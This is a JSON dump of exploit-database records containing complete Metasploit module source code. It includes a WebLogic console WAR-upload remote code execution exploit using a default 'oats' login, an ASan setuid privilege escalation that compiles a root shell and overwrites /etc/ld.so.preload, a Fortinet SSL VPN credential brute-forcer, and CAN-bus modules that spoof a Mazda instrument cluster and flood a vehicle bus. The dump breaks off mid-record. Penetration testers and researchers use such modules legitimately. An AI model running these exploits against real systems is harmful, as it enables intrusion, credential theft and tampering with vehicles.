{"metasploit": [{"lastseen": "2019-12-07T11:16:04", "bulletinFamily": "exploit", "description": "This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster\n", "modified": "2019-09-13T01:32:21", "published": "2019-09-11T16:07:42", "id": "MSF:POST/HARDWARE/AUTOMOTIVE/MAZDA_IC_MOVER", "href": "", "type": "metasploit", "title": "Mazda 2 Instrument Cluster Accelorometer Mover", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Mazda 2 Instrument Cluster Accelorometer Mover',\n 'Description' => %q{ This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster},\n 'License' => MSF_LICENSE,\n 'Author' => ['Jay Turla'],\n 'Platform' => ['hardware'],\n 'SessionTypes' => ['hwbridge']\n ))\n register_options([\n OptString.new('CANBUS', [false, \"CAN Bus to perform scan on, defaults to connected bus\", nil])\n ])\n end\n\n def run\n unless client.automotive\n print_error(\"The hwbridge requires a functional automotive extention\")\n return\n end\n print_status(\"Moving the accelorometer and speedometer...\")\n client.automotive.cansend(datastore['CANBUS'], \"202\", \"6001606060606000\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/hardware/automotive/mazda_ic_mover.rb"}, {"lastseen": "2019-11-30T10:27:56", "bulletinFamily": "exploit", "description": "This module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a \"oats\" account that you could log in with, which grants you administrator access.\n", "modified": "2019-05-24T15:06:47", "published": "2019-05-10T18:27:08", "id": "MSF:EXPLOIT/WINDOWS/HTTP/OATS_WEBLOGIC_CONSOLE", "href": "", "type": "metasploit", "title": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',\n 'Description' => %q{\n This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Steven Seeley', # Used the trick and told me about it\n 'sinn3r' # Metasploit module\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'WebLogic Server Administration Console 12 or prior', { } ]\n ],\n 'References' =>\n [\n # The CVE description matches what this exploit is doing, but it was for version\n # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.\n # ['CVE', '2007-2699']\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8088\n },\n 'Notes' =>\n {\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 13 2019',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),\n OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),\n OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])\n ])\n\n register_advanced_options(\n [\n OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\\\OracleATS'])\n ])\n end\n\n class LoginSpec\n attr_accessor :admin_console_session\n end\n\n def login_spec\n @login_spec ||= LoginSpec.new\n end\n\n class OatsWarPayload < MetasploitModule\n attr_reader :name\n attr_reader :war\n\n def initialize(payload)\n @name = [Faker::App.name, Rex::Text.rand_name].sample\n @war = payload.encoded_war(app_name: name).to_s\n end\n end\n\n def default_oats_path\n datastore['DefaultOatsPath']\n end\n\n def war_payload\n @war_payload ||= OatsWarPayload.new(payload)\n end\n\n def set_frsc\n value = get_deploy_frsc\n @frsc = value\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n })\n\n if res && res.body.include?('Oracle WebLogic Server Administration Console')\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def set_admin_console_session(res)\n cookie = res.get_cookies\n admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first\n vprint_status(\"Token for console session is: #{admin_console_session}\")\n login_spec.admin_console_session = admin_console_session\n end\n\n def is_logged_in?(res)\n html = res.get_html_document\n a_element = html.at('a')\n if a_element.respond_to?(:attributes) && a_element.attributes['href']\n link = a_element.attributes['href'].value\n return URI(link).request_uri == '/console'\n end\n\n false\n end\n\n def do_login\n uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n set_admin_console_session(res)\n\n uri = normalize_uri(target_uri.path, 'console', 'j_security_check')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_post' =>\n {\n 'j_username' => datastore['OATSUSERNAME'],\n 'j_password' => datastore['OATSPASSWORD'],\n 'j_character_encoding' => 'UTF-8'\n }\n })\n\n fail_with(Failure::Unknown, 'No response while trying to log in') unless res\n fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)\n store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])\n set_admin_console_session(res)\n end\n\n def get_deploy_frsc\n # First we are just going through the pages in a specific order to get the FRSC value\n # we need to prepare uploading the WAR file.\n res = nil\n requests =\n [\n { path: 'console/', vars: {} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\"} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\", '_pageLabel' => 'HomePage1'} }\n ]\n\n requests.each do |req|\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, req[:path]),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' => req[:vars]\n })\n\n fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res\n end\n\n html = res.get_html_document\n hidden_input = html.at('input[@name=\"ChangeManagerPortletfrsc\"]')\n frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil\n frsc_attr ? frsc_attr.value : ''\n end\n\n def do_select_upload_action\n action = '/com/bea/console/actions/app/install/selectUploadApp'\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\\\servers\\\\AdminServer\\\\upload')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_upload_app_action\n action = '/com/bea/console/actions/app/install/uploadApp'\n ctype = 'application/octet-stream'\n app_cname = 'AppApplicationInstallPortletuploadAppPath'\n plan_cname = 'AppApplicationInstallPortletuploadPlanPath'\n frsc_cname = 'AppApplicationInstallPortletfrsc'\n war = war_payload.war\n war_name = war_payload.name\n post_data = Rex::MIME::Message.new\n post_data.add_part(war, ctype, 'binary', \"form-data; name=\\\"#{app_cname}\\\"; filename=\\\"#{war_name}.war\\\"\")\n post_data.add_part('', ctype, nil, \"form-data; name=\\\"#{plan_cname}\\\"; filename=\\\"\\\"\")\n post_data.add_part(frsc, nil, nil, \"form-data; name=\\\"#{frsc_cname}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_app_select_action\n action = '/com/bea/console/actions/app/install/appSelected'\n war_name = war_payload.name\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, \"oats\\\\servers\\\\AdminServer\\\\upload\\\\#{war_name}.war\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_style_select_action\n action = '/com/bea/console/actions/app/install/targetStyleSelected'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortlettargetStyle' => 'Application',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_finish_action\n action = '/com/bea/console/actions/app/install/finish'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletname' => war_payload.name,\n 'AppApplicationInstallPortletsecurityModel' => 'DDOnly',\n 'AppApplicationInstallPortletstagingStyle' => 'Default',\n 'AppApplicationInstallPortletplanStagingStyle' => 'Default',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n\n # 302 is a good enough indicator of a successful upload, otherwise\n # the server would actually return a 200 with an error message.\n res.code == 302\n end\n\n def print_response_message(res)\n html = res.get_html_document\n message_div = html.at('div[@class=\"message\"]')\n if message_div\n msg = message_div.at('span').text\n print_status(\"Server replies: #{msg.inspect}\")\n end\n end\n\n def deploy_war\n set_frsc\n print_status(\"FRSC value: #{frsc}\")\n do_select_upload_action\n do_upload_app_action\n do_app_select_action\n do_style_select_action\n do_finish_action\n end\n\n def goto_war(name)\n print_good(\"Operation \\\"#{name}\\\" is a go!\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, name)\n })\n\n print_status(\"Code #{res.code} on \\\"#{name}\\\" request\") if res\n end\n\n def undeploy_war\n war_name = war_payload.name\n handle = 'com.bea.console.handles.JMXHandle(\"com.bea:Name=oats,Type=Domain\")'\n contents = %Q|com.bea.console.handles.AppDeploymentHandle(\"com.bea:Name=#{war_name},Type=AppDeployment\")|\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',\n 'AppDeploymentsControlPortlethandle' => handle\n },\n 'vars_post' =>\n {\n # For some reason, the value given to the server is escapped twice.\n # The Metasploit API should do it at least once.\n 'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),\n '_pageLabel' => 'AppApplicationUninstallPage',\n '_nfpb' => 'true',\n 'AppApplicationUninstallPortletfrsc' => frsc\n }\n })\n\n if res && res.code == 302\n print_good(\"Successfully undeployed #{war_name}.war\")\n else\n print_warning(\"Unable to successfully undeploy #{war_name}.war\")\n print_warning('You may want to do so manually.')\n end\n end\n\n def cleanup\n undeploy_war if is_cleanup_ready\n super\n end\n\n def setup\n @is_cleanup_ready = false\n super\n end\n\n def exploit\n unless check == Exploit::CheckCode::Detected\n print_status('Target does not have the login page we are looking for.')\n return\n end\n\n do_login\n print_good(\"Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}\")\n print_status(\"Ready for war. Codename \\\"#{war_payload.name}\\\" at #{war_payload.war.length} bytes\")\n result = deploy_war\n if result\n @is_cleanup_ready = true\n goto_war(war_payload.name)\n end\n end\n\n attr_reader :frsc\n attr_reader :is_cleanup_ready\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oats_weblogic_console.rb"}, {"lastseen": "2019-12-09T18:28:37", "bulletinFamily": "exploit", "description": "This module floods a CAN interface with supplied frames.\n", "modified": "2019-04-01T17:04:31", "published": "2019-03-20T12:17:41", "id": "MSF:POST/HARDWARE/AUTOMOTIVE/CAN_FLOOD", "href": "", "type": "metasploit", "title": "CAN Flood", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n DEFAULT_FRAMELIST = File.join(Msf::Config.data_directory, 'wordlists', 'can_flood_frames.txt')\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CAN Flood',\n 'Description' => 'This module floods a CAN interface with supplied frames.',\n 'Author' => 'Pietro Biondi',\n 'License' => MSF_LICENSE,\n 'Platform' => 'hardware',\n 'SessionTypes' => ['hwbridge']\n ))\n\n register_options([\n OptString.new('CANBUS', [true, 'CAN interface']),\n OptString.new('FRAMELIST', [true, 'Path to frame list file', DEFAULT_FRAMELIST]),\n OptInt.new('ROUNDS', [true, 'Number of executed rounds', 200])\n ])\n end\n\n def run\n unless File.exist?(datastore['FRAMELIST'])\n print_error(\"Frame list file '#{datastore['FRAMELIST']}' does not exist\")\n return\n end\n\n vprint_status(\"Reading frame list file: #{datastore['FRAMELIST']}\")\n frames = File.readlines(datastore['FRAMELIST']).map { |line| line.strip.split('+') }\n\n print_status(' -- FLOODING -- ')\n datastore['ROUNDS'].times do\n frames.each { |frame| client.automotive.cansend(datastore['CANBUS'], frame[0], frame[1]) }\n end\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/hardware/automotive/can_flood.rb"}, {"lastseen": "2019-12-09T09:05:37", "bulletinFamily": "exploit", "description": "This module scans for Fortinet SSL VPN web login portals and performs login brute force to identify valid credentials.\n", "modified": "2019-02-19T22:33:10", "published": "2019-02-14T08:35:02", "id": "MSF:AUXILIARY/SCANNER/HTTP/FORTINET_SSL_VPN", "href": "", "type": "metasploit", "title": "Fortinet SSL VPN Bruteforce Login Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Fortinet SSL VPN Bruteforce Login Utility',\n 'Description' => %{\n This module scans for Fortinet SSL VPN web login portals and\n performs login brute force to identify valid credentials.\n },\n 'Author' => [ 'Max Michels <kontakt[at]maxmichels.de>' ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 443\n }\n ))\n\n register_options(\n [\n OptString.new('DOMAIN', [false, \"Domain/Realm to use for each account\", ''])\n ])\n end\n\n def run_host(ip)\n unless check_conn?\n vprint_error(\"Connection failed, Aborting...\")\n return false\n end\n\n unless is_app_ssl_vpn?\n vprint_error(\"Application does not appear to be Fortinet SSL VPN. Module will not continue.\")\n return false\n end\n\n vprint_good(\"Application appears to be Fortinet SSL VPN. Module will continue.\")\n\n vprint_status(\"Starting login brute force...\")\n each_user_pass do |user, pass|\n do_login(user, pass)\n end\n end\n\n # Verify if server is responding\n def check_conn?\n begin\n res = send_request_cgi('uri' => '/', 'method' => 'GET')\n if res\n vprint_good(\"Server is responsive...\")\n return true\n end\n rescue ::Rex::ConnectionRefused,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionError,\n ::Errno::EPIPE\n end\n false\n end\n\n def get_login_resource\n send_request_raw(\n 'uri' => '/remote/login?lang=en'\n )\n end\n\n # Verify whether we're working with SSL VPN or not\n def is_app_ssl_vpn?\n res = get_login_resource\n res && res.code == 200 && res.body.match(/fortinet/)\n end\n\n def do_logout(cookie)\n send_request_cgi(\n 'uri' => '/remote/logout',\n 'method' => 'GET',\n 'cookie' => cookie\n )\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: 'Fortinet SSL VPN',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # Brute-force the login page\n def do_login(user, pass)\n vprint_status(\"Trying username:#{user.inspect} with password:#{pass.inspect}\")\n\n begin\n post_params = {\n 'ajax' => '1',\n 'username' => user,\n 'credential' => pass\n }\n\n #check to use domain/realm or not\n if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?\n post_params['realm'] = \"\"\n else\n post_params['realm'] = datastore['DOMAIN']\n end\n\n res = send_request_cgi(\n 'uri' => '/remote/logincheck',\n 'method' => 'POST',\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => post_params\n )\n\n if res &&\n res.code == 200 &&\n res.body.match(/redir=/) &&\n res.body.match(/&portal=/)\n\n do_logout(res.get_cookies)\n if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?\n print_good(\"SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}\")\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)\n report_note(ip: rhost, type: \"fortinet.ssl.vpn\",data: \"User: #{user}\")\n else\n print_good(\"SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{datastore[\"DOMAIN\"]}\")\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)\n report_note(ip: rhost, type: \"fortinet.ssl.vpn\",data: \"User: #{user} / Domain: #{datastore[\"DOMAIN\"]}\")\n end\n\n return :next_user\n\n else\n vprint_error(\"FAILED LOGIN - #{user.inspect}:#{pass.inspect}\")\n end\n\n rescue ::Rex::ConnectionRefused,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionError,\n ::Errno::EPIPE\n vprint_error(\"HTTP Connection Failed, Aborting\")\n return :abort\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb"}, {"lastseen": "2019-12-08T21:01:10", "bulletinFamily": "exploit", "description": "This module attempts to gain root privileges on Linux systems using setuid executables compiled with AddressSanitizer (ASan). ASan configuration related environment variables are permitted when executing setuid executables built with libasan. The `log_path` option can be set using the `ASAN_OPTIONS` environment variable, allowing clobbering of arbitrary files, with the privileges of the setuid user. This module uploads a shared object and sprays symlinks to overwrite `/etc/ld.so.preload` in order to create a setuid root shell.\n", "modified": "2019-11-03T00:33:24", "published": "2019-01-12T09:14:20", "id": "MSF:EXPLOIT/LINUX/LOCAL/ASAN_SUID_EXECUTABLE_PRIV_ESC", "href": "", "type": "metasploit", "title": "AddressSanitizer (ASan) SUID Executable Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AddressSanitizer (ASan) SUID Executable Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges on Linux systems using\n setuid executables compiled with AddressSanitizer (ASan).\n\n ASan configuration related environment variables are permitted when\n executing setuid executables built with libasan. The `log_path` option\n can be set using the `ASAN_OPTIONS` environment variable, allowing\n clobbering of arbitrary files, with the privileges of the setuid user.\n\n This module uploads a shared object and sprays symlinks to overwrite\n `/etc/ld.so.preload` in order to create a setuid root shell.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Szabolcs Nagy', # Discovery and PoC\n 'infodox', # unsanitary.sh Exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2016-02-17',\n 'Platform' => 'linux',\n 'Arch' =>\n [\n ARCH_X86,\n ARCH_X64,\n ARCH_ARMLE,\n ARCH_AARCH64,\n ARCH_PPC,\n ARCH_MIPSLE,\n ARCH_MIPSBE\n ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [['Auto', {}]],\n 'DefaultOptions' =>\n {\n 'AppendExit' => true,\n 'PrependSetresuid' => true,\n 'PrependSetresgid' => true,\n 'PrependFork' => true\n },\n 'References' =>\n [\n ['URL', 'https://seclists.org/oss-sec/2016/q1/363'],\n ['URL', 'https://seclists.org/oss-sec/2016/q1/379'],\n ['URL', 'https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e'],\n ['URL', 'https://github.com/bcoles/local-exploits/tree/master/asan-suid-root']\n ],\n 'Notes' =>\n {\n 'AKA' => ['unsanitary.sh'],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('SUID_EXECUTABLE', [true, 'Path to a SUID executable compiled with ASan', '']),\n OptInt.new('SPRAY_SIZE', [true, 'Number of PID symlinks to create', 50])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n\n self.needs_cleanup = true\n end\n\n def base_dir\n datastore['WritableDir']\n end\n\n def suid_exe_path\n datastore['SUID_EXECUTABLE']\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def upload_and_compile(path, data, gcc_args='')\n upload \"#{path}.c\", data\n\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n\n unless gcc_args.to_s.blank?\n gcc_cmd << \" #{gcc_args}\"\n end\n\n output = cmd_exec gcc_cmd\n\n unless output.blank?\n print_error 'Compiling failed:'\n print_line output\n end\n\n register_file_for_cleanup path\n chmod path\n end\n\n def check\n unless setuid? suid_exe_path\n vprint_error \"#{suid_exe_path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{suid_exe_path} is setuid\"\n\n # Check if the executable was compiled with ASan\n #\n # If the setuid executable is readable, and `ldd` is installed and in $PATH,\n # we can detect ASan via linked libraries. (`objdump` could also be used).\n #\n # Otherwise, we can try to detect ASan via the help output with the `help=1` option.\n # This approach works regardless of whether the setuid executable is readable,\n # with the obvious disadvantage that it requires invoking the executable.\n if cmd_exec(\"test -r #{suid_exe_path} && echo true\").to_s.include?('true') && command_exists?('ldd')\n unless cmd_exec(\"ldd #{suid_exe_path}\").to_s.include? 'libasan.so'\n vprint_error \"#{suid_exe_path} was not compiled with ASan\"\n return CheckCode::Safe\n end\n else\n unless cmd_exec(\"ASAN_OPTIONS=help=1 #{suid_exe_path}\").include? 'AddressSanitizer'\n vprint_error \"#{suid_exe_path} was not compiled with ASan\"\n return CheckCode::Safe\n end\n end\n vprint_good \"#{suid_exe_path} was compiled with ASan\"\n\n unless has_gcc?\n print_error 'gcc is not installed. Compiling will fail.'\n return CheckCode::Safe\n end\n vprint_good 'gcc is installed'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n unless writable? pwd.to_s.strip\n fail_with Failure::BadConfig, \"#{pwd.to_s.strip} working directory is not writable\"\n end\n\n if nosuid? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is mounted nosuid\"\n end\n\n @log_prefix = \".#{rand_text_alphanumeric 5..10}\"\n\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n rootshell_name = \".#{rand_text_alphanumeric 5..10}\"\n @rootshell_path = \"#{base_dir}/#{rootshell_name}\"\n rootshell = <<-EOF\n#include <stdio.h>\n#include <sys/stat.h>\n#include <unistd.h>\nint main(void)\n{\n setuid(0);\n setgid(0);\n execl(\"/bin/bash\", \"bash\", NULL);\n}\n EOF\n upload_and_compile @rootshell_path, rootshell, '-Wall'\n\n lib_name = \".#{rand_text_alphanumeric 5..10}\"\n lib_path = \"#{base_dir}/#{lib_name}.so\"\n lib = <<~EOF\n #include <stdlib.h>\n #include <stdio.h>\n #include <sys/stat.h>\n #include <unistd.h>\n void init(void) __attribute__((constructor));\n void __attribute__((constructor)) init() {\n if (setuid(0) || setgid(0))\n _exit(1);\n unlink(\"/etc/ld.so.preload\");\n chown(\"#{@rootshell_path}\", 0, 0);\n chmod(\"#{@rootshell_path}\", 04755);\n _exit(0);\n }\n EOF\n upload_and_compile lib_path, lib, '-fPIC -shared -ldl -Wall'\n\n spray_name = \".#{rand_text_alphanumeric 5..10}\"\n spray_path = \"#{base_dir}/#{spray_name}\"\n spray = <<~EOF\n #include <stdio.h>\n #include <sys/stat.h>\n #include <unistd.h>\n int main(void)\n {\n pid_t pid = getpid();\n char buf[64];\n for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {\n snprintf(buf, sizeof(buf), \"#{@log_prefix}.%ld\", (long)pid+i);\n symlink(\"/etc/ld.so.preload\", buf);\n }\n }\n EOF\n upload_and_compile spray_path, spray, '-Wall'\n\n exp_name = \".#{rand_text_alphanumeric 5..10}\"\n exp_path = \"#{base_dir}/#{exp_name}\"\n exp = <<~EOF\n #!/bin/sh\n #{spray_path}\n ASAN_OPTIONS=\"disable_coredump=1 suppressions='/#{@log_prefix}\n #{lib_path}\n ' log_path=./#{@log_prefix} verbosity=0\" \"#{suid_exe_path}\" >/dev/null 2>&1\n ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' \"#{suid_exe_path}\" >/dev/null 2>&1\n EOF\n upload_and_chmodx exp_path, exp\n\n print_status 'Launching exploit...'\n output = cmd_exec exp_path\n output.each_line { |line| vprint_status line.chomp }\n\n unless setuid? @rootshell_path\n fail_with Failure::Unknown, \"Failed to set-uid root #{@rootshell_path}\"\n end\n print_good \"Success! #{@rootshell_path} is set-uid root!\"\n vprint_line cmd_exec \"ls -la #{@rootshell_path}\"\n\n print_status 'Executing payload...'\n cmd_exec \"echo #{payload_path} | #{@rootshell_path} & echo \"\n end\n\n def cleanup\n # Safety check to ensure we don't delete everything in the working directory\n if @log_prefix.to_s.strip.eql? ''\n vprint_warning \"#{datastore['SPRAY_SIZE']} symlinks may require manual cleanup in: #{pwd}\"\n else\n cmd_exec \"rm #{pwd}/#{@log_prefix}*\"\n end\n ensure\n super\n end\n\n def on_new_session(session)\n # Remove rootshell executable\n if session.type.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n session.fs.file.rm @rootshell_path\n else\n session.shell_command_token \"rm -f '#{@rootshell_path}'\"\n end\n ensure\n super\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/asan_suid_executable_priv_esc.rb"}, {"lastseen": "2019-11-26T16:28:27", "bulletinFamily": "exploit", "description": "This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode. This module was successfully tested on Imperva SecureSphere 13.0/13.1/ 13.2 in pre-ftl mode and unsealed gateway mode.\n", 